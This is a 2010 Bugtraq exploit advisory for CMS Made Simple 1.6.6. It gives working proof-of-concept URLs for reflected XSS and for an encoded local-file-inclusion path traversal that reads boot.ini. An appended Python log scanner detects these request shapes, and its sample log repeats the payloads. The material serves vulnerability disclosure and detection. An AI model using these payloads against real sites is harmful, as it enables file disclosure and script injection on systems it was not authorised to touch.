cmsmadesimple Multiple Security Issues : XSS+ LFI

Board: Bugtraq | Posted: 2010/02/13 04:32
################################################################
# est.2007                               forum.darkc0de.com
################################################################
# Greetz to all Darkc0de, AI, ICW, AH Members
# Shoutz to r45c4l, j4ckh4x0r, silic0n, smith, baltazar, d3hydr8, FB1H2S,
# lowlz, Eberly, Sumit
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986@gmail.com
#
# Share the c0de!
#
################################################################
#
# Exploit: Multiple Vulnerabilities in cmsmadesimple
#
# AppSite: http://www.cmsmadesimple.com/
#
# Tested Version : 1.6.6
#
# XSS
#
# POC:-http://localhost/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
#
# Multiple Local File Inclusion
#
# Sample URL:
# POC:-http://localhost:80/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39
#
################################################################
Article ID (AID): #1BTRh3Oo (Bugtraq)
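A log check for the two request shapes in this advisory, as an added example that is not part of the original post: it percent-decodes each query string and flags a `mact` field that is not a plain identifier (traversal sequence, NUL byte) and markup characters in a `showtemplate` value. The function names, the identifier-only rule for `mact` fields and the log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption for this example: every comma-separated mact field should be a
# plain identifier, as in a normal "News,cntnt01,detail,0" request.
SAFE_FIELD = re.compile(r"[A-Za-z0-9_]*")
TRAVERSAL = re.compile(r"\.\.[\\/]")
MARKUP = re.compile(r"[<>\"']")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_request(target):
    """Return findings for one request target (path plus query string)."""
    findings = []
    # parse_qs percent-decodes values, so %5c, %2c and %00 are seen decoded.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if "\x00" in value:
                findings.append(f"{name}: NUL byte")
            if TRAVERSAL.search(value):
                findings.append(f"{name}: path traversal sequence")
            if name == "mact" and not all(
                SAFE_FIELD.fullmatch(f) for f in value.split(",")
            ):
                findings.append("mact: field is not a plain identifier")
            if name.endswith("showtemplate") and MARKUP.search(value):
                findings.append(f"{name}: markup in flag value")
    return findings

def scan(log_lines):
    """Return (target, findings) for each access-log line that trips a check."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        findings = inspect_request(match.group(1)) if match else []
        if findings:
            hits.append((match.group(1), findings))
    return hits

# Constructed log lines (combined log format, documentation IPs), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Feb/2010:04:30:01 +0000] "GET /cmsmadesimple/index.php'
    '?mact=News%2ccntnt01%2cdetail%2c0&cntnt01articleid=1 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [13/Feb/2010:04:31:07 +0000] "GET /cmsmadesimple/index.php'
    '?mact=News%2ccntnt01%2c%5c..%5c..%5cboot.ini%00%2c0&cntnt01showtemplate=false HTTP/1.1" 200 312',
    '192.0.2.12 - - [13/Feb/2010:04:32:40 +0000] "GET /cmsmadesimple/index.php'
    '?page=tags-in-the-core&showtemplate=false%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 901',
]
```

`scan(SAMPLE_LOG)` returns the second and third lines with their findings; the same `inspect_request` checks can be applied as input validation in front of the application.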